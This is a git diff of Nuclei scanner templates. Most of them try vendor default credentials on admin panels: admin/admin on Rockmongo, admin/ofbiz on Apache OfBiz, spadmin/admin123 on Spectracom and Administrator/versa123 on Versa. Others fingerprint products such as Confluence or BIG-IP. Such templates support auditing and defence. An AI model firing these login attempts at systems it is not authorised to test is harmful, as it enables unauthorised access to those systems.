b/poc/default/octobercms-default-login.yaml index ac7530cfa6..a6822af271 100644 --- a/poc/default/octobercms-default-login.yaml +++ b/poc/default/octobercms-default-login.yaml @@ -1,25 +1,26 @@ id: octobercms-default-login - info: - name: OctoberCMS Default Login + name: OctoberCMS - Default Admin Discovery author: princechaddha severity: high - description: OctoberCMS default administrator account credential. + description: OctoberCMS default admin credentials were discovered. reference: - https://github.com/octobercms/october - https://octobercms.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: verified: true shodan-query: http.component:"October CMS" tags: octobercms,default-login,oss - requests: - raw: - | GET /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} @@ -27,7 +28,6 @@ requests: Content-Type: application/x-www-form-urlencoded _token={{token}}&postback=1&login={{username}}&password={{password}} - cookie-reuse: true attack: clusterbomb payloads: @@ -36,7 +36,6 @@ requests: password: - admin - "" - matchers-condition: and matchers: - type: word @@ -45,11 +44,9 @@ requests: - "october_session=" - "admin_auth=" condition: and - - type: status status: - 302 - extractors: - type: regex part: body @@ -58,3 +55,5 @@ requests: group: 1 regex: - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' + +# Enhanced by mp on 2022/07/15 diff --git a/poc/default/ofbiz-default-login-9210.yaml b/poc/default/ofbiz-default-login-9210.yaml index 266b9cb6b3..a7ee2e5601 100644 --- a/poc/default/ofbiz-default-login-9210.yaml +++ b/poc/default/ofbiz-default-login-9210.yaml @@ -1,19 +1,9 @@ id: ofbiz-default-login - info: name: Apache OfBiz Default Login author: pdteam - description: Apache OfBiz default admin credentials were discovered. severity: medium tags: ofbiz,default-login,apache - reference: - - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - requests: - raw: - | @@ -22,19 +12,15 @@ requests: Content-Type: application/x-www-form-urlencoded USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y - payloads: username: - admin password: - ofbiz attack: pitchfork - matchers: - type: word words: - "ofbiz-pagination-template" - "Powered by OFBiz" condition: and - -# Enhanced by mp on 2022/03/10 diff --git a/poc/default/openemr-default-login.yaml b/poc/default/openemr-default-login.yaml index 5a08aa24f2..0d2f25a536 100644 --- a/poc/default/openemr-default-login.yaml +++ b/poc/default/openemr-default-login.yaml @@ -1,9 +1,8 @@ id: openemr-default-login - info: - name: OpenEMR Default Login + name: OpenEMR - Default Admin Discovery author: Geekby - description: OpenEMR default login was discovered. + description: OpenEMR default admin credentials were discovered. severity: high reference: - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image @@ -15,7 +14,6 @@ info: fofa-query: app="OpenEMR" shodan-query: http.html:"OpenEMR" tags: openemr,default-login - requests: - raw: - | @@ -24,14 +22,12 @@ requests: Content-Type: application/x-www-form-urlencoded new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10 - attack: pitchfork payloads: user: - admin pass: - pass - matchers-condition: and matchers: - type: word @@ -40,7 +36,8 @@ requests: - "main.php?token_main=" - "OpenEMR" condition: and - - type: status status: - 302 + +# Enhanced by mp on 2022/07/15 diff --git a/poc/default/rancher-default-login.yaml b/poc/default/rancher-default-login.yaml index d189f6d141..5c29f0c69b 100644 --- a/poc/default/rancher-default-login.yaml +++ b/poc/default/rancher-default-login.yaml @@ -7,11 +7,12 @@ info: reference: - https://github.com/rancher/rancher - https://rancher.com/docs/rancher/v2.5/en/admin-settings/authentication/local/ + tags: default-login,rancher,kubernetes,devops,cloud classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: default-login,rancher,kubernetes,devops,cloud requests: - raw: - | diff --git a/poc/default/rockmongo-default-credentials.yaml b/poc/default/rockmongo-default-credentials.yaml index 2e2ec7b575..000d75a278 100644 --- a/poc/default/rockmongo-default-credentials.yaml +++ b/poc/default/rockmongo-default-credentials.yaml @@ -1,11 +1,9 @@ id: rockmongo-default-credentials - info: name: Rockmongo Default Credentials author: pikpikcu severity: high tags: rockmongo,default-login - requests: - raw: - | @@ -16,16 +14,13 @@ requests: Referer: {{Hostname}}/index.php?action=login.index more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3 - matchers-condition: and matchers: - - type: word words: - "Location: /index.php?action=admin.index&host=0" - "Set-Cookie: ROCK_LANG=" part: header - - type: status status: - 302 diff --git a/poc/default/rockmongo-default-login.yaml b/poc/default/rockmongo-default-login.yaml index c194ac4f25..d1164252a3 100644 --- a/poc/default/rockmongo-default-login.yaml +++ b/poc/default/rockmongo-default-login.yaml @@ -4,13 +4,14 @@ info: author: pikpikcu severity: high description: Rockmongo default admin credentials were discovered. + tags: rockmongo,default-login reference: - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: rockmongo,default-login requests: - raw: - | diff --git a/poc/default/showdoc-default-login-10221.yaml b/poc/default/showdoc-default-login-10221.yaml index 3c79212154..056d562bcb 100644 --- a/poc/default/showdoc-default-login-10221.yaml +++ b/poc/default/showdoc-default-login-10221.yaml @@ -4,18 +4,11 @@ info: name: Showdoc Default Login author: pikpikcu severity: medium - description: Showdoc default credentials were discovered. reference: - https://blog.star7th.com/2016/05/2007.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 tags: showdoc,default-login - metadata: - max-request: 1 -http: +requests: - raw: - | POST /server/index.php?s=/api/user/login HTTP/1.1 @@ -43,5 +36,3 @@ http: - type: status status: - 200 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/default/spectracom-default-login.yaml b/poc/default/spectracom-default-login.yaml index c3b83c4f09..07b09fe30a 100644 --- a/poc/default/spectracom-default-login.yaml +++ b/poc/default/spectracom-default-login.yaml @@ -1,17 +1,11 @@ id: spectracom-default-login + info: name: Spectracom Default Login author: madrobot - severity: high - description: Spectracom default admin credentials were discovered. + severity: medium tags: spectracom,default-login - reference: - - https://orolia.com/manuals/NC/Content/NC_and_SS/Com/Topics/ADMIN/Passwords.htm - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 + requests: - raw: - | @@ -20,12 +14,14 @@ requests: Content-Type: application/x-www-form-urlencoded data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}} + payloads: username: - spadmin password: - admin123 attack: pitchfork + matchers-condition: and matchers: - type: word @@ -34,8 +30,7 @@ requests: - "deleted" part: header condition: and + - type: status status: - 302 - -# Enhanced by mp on 2022/03/11 diff --git a/poc/default/tomcat-default-login.yaml b/poc/default/tomcat-default-login.yaml index 071367c987..4e522c9229 100644 --- a/poc/default/tomcat-default-login.yaml +++ b/poc/default/tomcat-default-login.yaml @@ -2,8 +2,8 @@ id: tomcat-default-login info: name: ApahceTomcat Manager Default Login author: pdteam - description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. severity: high + description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/ tags: tomcat,apache,default-login @@ -55,11 +55,15 @@ requests: attack: pitchfork # Available options: sniper, pitchfork and clusterbomb matchers-condition: and matchers: + - type: word + part: body + words: + - "Apache Tomcat" + - "Server Information" + - "Hostname" + condition: and - type: status status: - 200 - - type: word - words: - - Apache Tomcat # Enhanced by mp on 2022/03/03 diff --git a/poc/default/versa-default-login-11003.yaml b/poc/default/versa-default-login-11003.yaml index 1dd0c3bf52..88ea1895eb 100644 --- a/poc/default/versa-default-login-11003.yaml +++ b/poc/default/versa-default-login-11003.yaml @@ -1,33 +1,35 @@ id: versa-default-login - info: name: Versa Networks SD-WAN Application Default Login author: davidmckennirey severity: high - description: Searches for default admin credentials for the Versa Networks SD-WAN application. + description: Versa Networks SD-WAN application default admin credentials were discovered. tags: default-login,versa,sdwan - + reference: + - https://versa-networks.com/products/sd-wan.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 requests: - raw: - | GET /versa/login.html HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate - - | POST /versa/login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{user}}&password={{pass}}&sso=systemRadio - attack: pitchfork payloads: user: - Administrator pass: - versa123 - cookie-reuse: true req-condition: true matchers-condition: and @@ -38,9 +40,10 @@ requests: - "contains(tolower(all_headers_2), 'jsessionid')" - "contains(tolower(all_headers_2), 'location: /versa/index.html')" condition: and - - type: dsl dsl: - "contains(tolower(all_headers_2), '/login?error=true')" - "contains(tolower(all_headers_2), '/login?tokenmissingerror=true')" - negative: true \ No newline at end of file + negative: true + +# Enhanced by mp on 2022/03/11 diff --git a/poc/default/wifisky-default-password.yaml b/poc/default/wifisky-default-password.yaml index 58c4881478..ece1a116da 100644 --- a/poc/default/wifisky-default-password.yaml +++ b/poc/default/wifisky-default-password.yaml @@ -1,9 +1,11 @@ id: wifisky-default-password + info: name: Wifisky Default Password author: pikpikcu severity: high tags: default-login,wifisky + requests: - raw: - | @@ -15,18 +17,22 @@ requests: Connection: close username=admin&password=admin + matchers-condition: and matchers: + - type: word words: - "text/html" part: header + - type: word words: - '"success":"true"' - '"data":' part: body condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/default/wso2-default-login.yaml b/poc/default/wso2-default-login.yaml index 8353ac6595..525f6e9bfd 100644 --- a/poc/default/wso2-default-login.yaml +++ b/poc/default/wso2-default-login.yaml @@ -3,14 +3,7 @@ info: name: WSO2 Management Console Default Login author: cocxanh severity: high - description: WSO2 Management Console default admin credentials were discovered. - reference: - - https://docs.wso2.com/display/UES100/Accessing+the+Management+Console - - https://is.docs.wso2.com/en/5.12.0/learn/multi-attribute-login/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + reference: https://docs.wso2.com/display/UES100/Accessing+the+Management+Console tags: default-login,wso2 requests: - raw: @@ -34,5 +27,3 @@ requests: - "JSESSIONID" part: header condition: and - -# Enhanced by mp on 2022/04/05 diff --git a/poc/default/zabbix-default-login-11760.yaml b/poc/default/zabbix-default-login-11760.yaml index 15bc04319f..c28c788318 100644 --- a/poc/default/zabbix-default-login-11760.yaml +++ b/poc/default/zabbix-default-login-11760.yaml @@ -3,19 +3,10 @@ id: zabbix-default-login info: name: Zabbix Default Login author: pdteam - severity: high - description: Zabbix default admin credentials were discovered. - reference: - - https://openbaton.github.io/documentation/zabbix-server-configuration-3.0/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 + severity: critical tags: zabbix,default-login - metadata: - max-request: 1 -http: +requests: - raw: - | POST /index.php HTTP/1.1 @@ -42,5 +33,3 @@ http: - type: status status: - 302 - -# Enhanced by mp on 2022/03/13 diff --git a/poc/default/zmanda-default-login-11826.yaml b/poc/default/zmanda-default-login-11826.yaml index 87ba8ff8ee..f8cf00f71f 100644 --- a/poc/default/zmanda-default-login-11826.yaml +++ b/poc/default/zmanda-default-login-11826.yaml @@ -3,14 +3,15 @@ info: name: Zmanda Default Login author: Techryptic (@Tech) severity: high - description: Zmanda default admin credentials admin:admin were discovered. + description: "Zmanda default admin credentials admin:admin were discovered." reference: - https://www.zmanda.com + tags: zmanda,default-login classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 + cve-id: cwe-id: CWE-522 - tags: zmanda,default-login requests: - raw: - | @@ -35,4 +36,4 @@ requests: status: - 200 -# Enhanced by mp on 2022/04/04 +# Enhanced by mp on 2022/03/13 diff --git a/poc/detect/Biometric-detect.yaml b/poc/detect/Biometric-detect.yaml index 7db4c1a484..002dcf825a 100644 --- a/poc/detect/Biometric-detect.yaml +++ b/poc/detect/Biometric-detect.yaml @@ -4,6 +4,7 @@ info: name: Biometric or Fingerprint detect author: gaurang severity: info + tags: android,file file: - extensions: diff --git a/poc/detect/aem-detection-146.yaml b/poc/detect/aem-detection-146.yaml index 421bb35f54..bb3d7e0753 100644 --- a/poc/detect/aem-detection-146.yaml +++ b/poc/detect/aem-detection-146.yaml @@ -2,9 +2,8 @@ id: aem-detection info: name: Favicon based AEM Detection - severity: info author: shifacyclewala,hackergautam - tags: aem,favicon,tech + severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a @@ -13,6 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe requests: - method: GET @@ -25,4 +25,4 @@ requests: matchers: - type: dsl dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/detect/autobahn-python-detect-593.yaml b/poc/detect/autobahn-python-detect-593.yaml index 5697bfc546..3a6054cc5a 100644 --- a/poc/detect/autobahn-python-detect-593.yaml +++ b/poc/detect/autobahn-python-detect-593.yaml @@ -4,12 +4,10 @@ info: name: Autobahn-Python Webserver Detect author: pussycat0x severity: info - metadata: - max-request: 1 - shodan-query: "AutobahnPython" + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 tags: tech,webserver -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -29,5 +27,3 @@ http: part: body regex: - 'AutobahnPython([ 0-9.]+)' - -# digest: 4a0a004730450220299433f7a72c6c61f07be31feb69fbd48adc66cd0448767c424a96c597a762f7022100cc56d7af729b231f58beaee35f874d397f81497e67985ffb7c2d9c1f74131a56:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/bedita-detect.yaml b/poc/detect/bedita-detect.yaml index 449784fe63..fe6a5a8a6d 100644 --- a/poc/detect/bedita-detect.yaml +++ b/poc/detect/bedita-detect.yaml @@ -1,25 +1,25 @@ -id: bedita-detect - -info: - name: BEdita detect - author: pikpikcu - severity: info - tags: tech,bedita - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: regex - part: body - regex: - - 'BEdita(.*)
' - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'target="besite">(.*)
' +id: bedita-detect + +info: + name: BEdita detect + author: pikpikcu + severity: info + tags: tech,bedita + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: body + regex: + - 'BEdita(.*)
' + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'target="besite">(.*)
' diff --git a/poc/detect/bigip-config-utility-detect.yaml b/poc/detect/bigip-config-utility-detect.yaml index 4d3c250775..7ca3439c5e 100644 --- a/poc/detect/bigip-config-utility-detect.yaml +++ b/poc/detect/bigip-config-utility-detect.yaml @@ -4,12 +4,16 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info + metadata: + max-request: 3 + tags: tech,bigip -requests: +http: - method: GET path: - "{{BaseURL}}/tmui/login.jsp" - "{{BaseURL}}/tmui/tmui/login/welcome.jsp" + matchers: - type: word words: @@ -17,9 +21,11 @@ requests: - "Configuration Utility" condition: and part: body + - method: GET path: - "{{BaseURL}}/mgmt/tm/sys/management-ip" + matchers: - type: word words: @@ -27,7 +33,10 @@ requests: - "Enterprise Manager" condition: and part: header + - type: word words: - "check your user-id and password and try again" - part: body \ No newline at end of file + part: body + +# digest: 4b0a00483046022100f8ef3b159105fe202ca01534cbc95d96b1ee1d9b0797d2b7a69ea786fb069fe3022100e9031155ddc9c9cf28f645d6aa996070c76ba606d138037cccdea4348bdb04ee:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/burp-api-detect.yaml b/poc/detect/burp-api-detect.yaml index d1c703aa98..68a7000ee7 100644 --- a/poc/detect/burp-api-detect.yaml +++ b/poc/detect/burp-api-detect.yaml @@ -4,9 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech + reference: https://portswigger.net/burp/documentation/enterprise/api-reference requests: - method: GET diff --git a/poc/detect/cacti-detect.yaml b/poc/detect/cacti-detect.yaml index 10d928122a..b13f15fcbd 100644 --- a/poc/detect/cacti-detect.yaml +++ b/poc/detect/cacti-detect.yaml @@ -4,7 +4,6 @@ info: author: geeknik description: Cacti is a complete network graphing solution -- https://www.cacti.net/ severity: info - tags: tech,cacti requests: - method: GET @@ -33,4 +32,4 @@ requests: - type: kval part: header kval: - - Set_Cookie + - Set-Cookie \ No newline at end of file diff --git a/poc/detect/carestream-vue-detect-861.yaml b/poc/detect/carestream-vue-detect-861.yaml index c49c48b023..9e39ae8399 100644 --- a/poc/detect/carestream-vue-detect-861.yaml +++ b/poc/detect/carestream-vue-detect-861.yaml @@ -7,20 +7,17 @@ info: description: This template will detect a running CARESTREAM Vue Motion instance reference: - https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf - metadata: - max-request: 2 tags: tech,myvuehelp -http: +requests: - method: GET path: - "{{BaseURL}}/portal/favicon.ico" - "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png" - host-redirects: true + redirects: true stop-at-first-match: true max-redirects: 2 - matchers-condition: or matchers: - type: dsl @@ -31,6 +28,4 @@ http: - type: dsl name: "myvuehelp-favicon" dsl: - - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" - -# digest: 4a0a0047304502202aa3815b8f72b57cadb19de2cc86ba80a0a522bc8e65806218ea4f28cc837f7a022100820759ab55360d8f1aad39af864f4baa1f6b2e92dce3a43961f73f7f1c737b53:922c64590222798bb761d5b6d8e72950 + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" \ No newline at end of file diff --git a/poc/detect/chevereto-detect.yaml b/poc/detect/chevereto-detect.yaml index 59ba07f6fa..070a428307 100644 --- a/poc/detect/chevereto-detect.yaml +++ b/poc/detect/chevereto-detect.yaml @@ -4,14 +4,12 @@ info: name: Chevereto detect author: pikpikcu severity: info - metadata: - shodan-query: http.title:"Centreon" tags: tech,chevereto requests: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}/login" matchers-condition: and matchers: @@ -20,10 +18,6 @@ requests: regex: - 'content="Chevereto(.*)">' - - type: status - status: - - 200 - extractors: - type: regex part: body diff --git a/poc/detect/citrix-adc-gateway-detect-983.yaml b/poc/detect/citrix-adc-gateway-detect-983.yaml index a542c13028..c8db1fce4c 100644 --- a/poc/detect/citrix-adc-gateway-detect-983.yaml +++ b/poc/detect/citrix-adc-gateway-detect-983.yaml @@ -1,18 +1,16 @@ id: citrix-adc-gateway-panel - info: name: Citrix ADC Gateway detect author: organiccrap severity: info - tags: panel,citrix - requests: - method: GET path: - '{{BaseURL}}/logon/LogonPoint/index.html' - '{{BaseURL}}/logon/LogonPoint/custom.html' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - - '_ctxstxt_CitrixCopyright' + - _ctxstxt_CitrixCopyright diff --git a/poc/detect/confluence-detect-1189.yaml b/poc/detect/confluence-detect-1189.yaml index 0e17bc5ab9..4809b79801 100644 --- a/poc/detect/confluence-detect-1189.yaml +++ b/poc/detect/confluence-detect-1189.yaml @@ -1,17 +1,27 @@ id: confluence-detect info: - name: Confluence Detect - author: philippedelteil + name: Confluence Detection + author: philippedelteil,AdamCrosser,6mile severity: info - description: Allows you to detect Atlassian Confluence instances + description: | + This nuclei template is used to detect the presence of Confluence, a popular collaboration software. + classification: + cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:* metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: tech,confluence,atlassian + max-request: 5 + vendor: atlassian + product: confluence_server + shodan-query: + - http.component:"Atlassian Confluence" + - http.component:"atlassian confluence" + category: productivity + tags: tech,confluence,atlassian,detect -requests: +http: - method: GET path: + - "{{BaseURL}}/dologin.action" - "{{BaseURL}}" - "{{BaseURL}}/pages" - "{{BaseURL}}/confluence" @@ -19,22 +29,25 @@ requests: redirects: true stop-at-first-match: true - matchers-condition: or matchers: - - type: word - part: header - words: - - '-confluence-' - case-insensitive: true - - - type: word - part: body - words: - - 'confluence-base-url' + - type: dsl + dsl: + - contains(to_lower(header), '-confluence-') + - contains(to_lower(body), 'confluence-base-url') extractors: - type: regex - part: body + name: version group: 1 regex: + - '' - 'Atlassian Confluence ([a-z0-9-._]+)' + + - type: regex + name: hostname + group: 1 + regex: + - '' + - '' + - '' +# digest: 4a0a004730450221009bf2f9a3fec8732657aa0e11ec7a7bad6998606a6fdf448adb743732992b14f3022027018043be481632180a2d55600542cba51743a087e2657c16dbd23428ea2382:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/contentkeeper-detect.yaml b/poc/detect/contentkeeper-detect.yaml index c7507a5657..b5b6a8daf5 100644 --- a/poc/detect/contentkeeper-detect.yaml +++ b/poc/detect/contentkeeper-detect.yaml @@ -5,8 +5,7 @@ info: author: geeknik severity: info description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning. - reference: - - https://www.contentkeeper.com/ + reference: https://www.contentkeeper.com/ tags: contentkeeper,panel requests: diff --git a/poc/detect/csrfguard-detect-1291.yaml b/poc/detect/csrfguard-detect-1291.yaml index a751a4538e..f3242a8547 100644 --- a/poc/detect/csrfguard-detect-1291.yaml +++ b/poc/detect/csrfguard-detect-1291.yaml @@ -1,29 +1,24 @@ id: csrf-guard-detect info: - name: OWASP CSRFGuard 3.x/4.x - Detect + name: OWASP CSRF Guard detection author: forgedhallpass severity: info - description: OWASP CSRFGuard 3.x and 4.x were checked for whether token-per-page support is enabled based on default configuration. - reference: - - https://github.com/OWASP/www-project-csrfguard - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 3 + description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration. + reference: https://github.com/OWASP/www-project-csrfguard tags: tech,csrfguard,owasp -http: +requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + - | GET /JavaScriptServlet HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} + - | POST /JavaScriptServlet HTTP/1.1 Host: {{Hostname}} @@ -55,6 +50,7 @@ http: - 'status_code_3==200' - 'contains(body, "{\"pageTokens")' + cookie-reuse: true extractors: - type: regex name: masterToken @@ -73,5 +69,3 @@ http: name: "page-token" json: - '.pageTokens' - -# digest: 4a0a00473045022100be9f0de5a4ed056ec8b1e162a22cd7e372cb88f262008a0f459d95a8b07463c80220102efa4fe89248e28958130257b44a7e4af82ac033f6c447f6c5a99ca5ba299f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/darkstat-detect.yaml b/poc/detect/darkstat-detect.yaml index 630b00c077..89c8d405d8 100644 --- a/poc/detect/darkstat-detect.yaml +++ b/poc/detect/darkstat-detect.yaml @@ -1,5 +1,4 @@ id: darkstat-detect - info: name: Detect Darkstat Reports author: geeknik @@ -7,7 +6,6 @@ info: reference: https://unix4lyfe.org/darkstat/ severity: high tags: darkstat,logs,exposure - requests: - method: GET path: @@ -28,7 +26,6 @@ requests: - "Measuring for" - "hosts" condition: and - extractors: - type: kval part: header diff --git a/poc/detect/dell-idrac6-detect.yaml b/poc/detect/dell-idrac6-detect.yaml index ebca549e38..3a52fd5ad5 100644 --- a/poc/detect/dell-idrac6-detect.yaml +++ b/poc/detect/dell-idrac6-detect.yaml @@ -2,8 +2,8 @@ id: dell-idrac6-detect info: name: Detect Dell iDRAC6 author: kophjager007 - severity: info description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. + severity: info tags: tech,dell requests: - method: GET diff --git a/poc/detect/dell-idrac7-detect-6922.yaml b/poc/detect/dell-idrac7-detect-6922.yaml index f11ad8b32e..91cae2e567 100644 --- a/poc/detect/dell-idrac7-detect-6922.yaml +++ b/poc/detect/dell-idrac7-detect-6922.yaml @@ -4,14 +4,11 @@ info: author: kophjager007 description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers. severity: info - + tags: tech,dell requests: - method: GET - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 path: - "{{BaseURL}}/data?get=prodServerGen" - matchers-condition: and matchers: - type: status @@ -21,9 +18,8 @@ requests: part: body words: - "12G" - extractors: - type: regex part: body regex: - - '[0-9]{2}G' \ No newline at end of file + - '[0-9]{2}G' diff --git a/poc/detect/detect-dns-over-https.yaml b/poc/detect/detect-dns-over-https.yaml index 65d9a2bf23..8ac33de078 100644 --- a/poc/detect/detect-dns-over-https.yaml +++ b/poc/detect/detect-dns-over-https.yaml @@ -21,11 +21,13 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/dns-message" - part: header + - type: regex + part: header regex: - "(C|c)ontent-(L|l)ength: 49" - part: header diff --git a/poc/detect/detect-drone.yaml b/poc/detect/detect-drone.yaml index 01384c4d0a..8095d264c8 100644 --- a/poc/detect/detect-drone.yaml +++ b/poc/detect/detect-drone.yaml @@ -1,17 +1,14 @@ id: detect-drone-config - info: name: Detect Drone Configuration author: geeknik - description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone severity: high + description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone tags: config,exposure,drone - requests: - method: GET path: - "{{BaseURL}}/.drone.yml" - matchers-condition: and matchers: - type: word diff --git a/poc/detect/detect-sentry-6983.yaml b/poc/detect/detect-sentry-6983.yaml index 8acee667d0..b6ab96f47f 100644 --- a/poc/detect/detect-sentry-6983.yaml +++ b/poc/detect/detect-sentry-6983.yaml @@ -1,21 +1,18 @@ id: detect-sentry - info: name: Detect Sentry Instance author: Sicksec severity: info tags: ssrf,sentry,tech - reference: | - - https://hackerone.com/reports/374737 - - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en - + reference: + - https://hackerone.com/reports/374737 + - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+" \ No newline at end of file + - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+" diff --git a/poc/detect/dns-waf-detect-7054.yaml b/poc/detect/dns-waf-detect-7054.yaml index 8e953384fd..bdd9b4b38d 100644 --- a/poc/detect/dns-waf-detect-7054.yaml +++ b/poc/detect/dns-waf-detect-7054.yaml @@ -3,9 +3,6 @@ info: name: DNS WAF Detection author: lu4nx severity: info - description: A DNS WAF was detected. - classification: - cwe-id: CWE-200 tags: tech,waf,dns dns: - name: "{{FQDN}}" @@ -138,5 +135,3 @@ dns: name: edns words: - ".iidns.com" - -# Enhanced by mp on 2022/03/13 diff --git a/poc/detect/elasticsearch-sql-client-detect.yaml b/poc/detect/elasticsearch-sql-client-detect.yaml index e075189456..b6efdc2579 100644 --- a/poc/detect/elasticsearch-sql-client-detect.yaml +++ b/poc/detect/elasticsearch-sql-client-detect.yaml @@ -1,23 +1,24 @@ -id: elasticsearch-sql-client-detect -info: - name: Elasticsearch SQL Client Detect - author: pussycat0x - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 - tags: elasticsearch,tech,sql +id: elasticsearch-sql-client-detect -requests: - - method: GET - path: - - '{{BaseURL}}' +info: + name: Elasticsearch SQL Client Detect + author: pussycat0x + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22 + tags: elasticsearch,tech,sql - matchers-condition: and - matchers: - - type: word - words: - - 'Elasticsearch-sql client' - part: body - - - type: status - status: - - 200 +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Elasticsearch-sql client' + part: body + + - type: status + status: + - 200 diff --git a/poc/detect/froxlor-detect-7552.yaml b/poc/detect/froxlor-detect-7552.yaml index b3336641ef..cff2ec6735 100644 --- a/poc/detect/froxlor-detect-7552.yaml +++ b/poc/detect/froxlor-detect-7552.yaml @@ -4,16 +4,17 @@ info: name: Froxlor Detect author: pikpikcu severity: info + metadata: + max-request: 1 tags: tech,froxlor -requests: +http: - method: GET path: - - 